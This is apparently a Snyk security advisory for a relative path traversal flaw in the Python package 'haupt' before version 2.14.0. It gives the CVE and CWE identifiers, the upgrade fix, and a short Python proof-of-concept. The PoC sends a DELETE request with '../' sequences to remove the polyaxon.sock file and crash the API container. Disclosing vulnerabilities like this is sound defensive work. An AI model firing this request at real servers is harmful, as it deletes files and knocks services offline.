Relative Path Traversal Affecting haupt package, versions [,2.14.0)


Severity

Recommended
0.0
high
0
10

CVSS assessment by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
0.98% (58th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Relative Path Traversal vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-PYTHON-HAUPT-15825750
  • published30 Mar 2026
  • disclosed20 Mar 2025
  • creditHRP

Introduced: 20 Mar 2025

CVE-2024-9363  (opens in a new tab)
CWE-23  (opens in a new tab)

How to fix?

Upgrade haupt to version 2.14.0 or higher.

Overview

Affected versions of this package are vulnerable to Relative Path Traversal enabling the deletion of files on the target server. An attacker can delete critical files such as polyaxon.sock to cause a crash of the API container.

PoC


import requests

url = "http://host:8000/streams/v1/x/x/x/runs/%2e%2e/artifacts"
params = {
    "path": "../../../../../polyaxon/web/polyaxon.sock"
}

headers = {
    ...
}

response = requests.delete(url, headers=headers, params=params)

print("Status Code:", response.status_code)
print("Response Text:", response.text)

CVSS Base Scores

version 4.0
version 3.1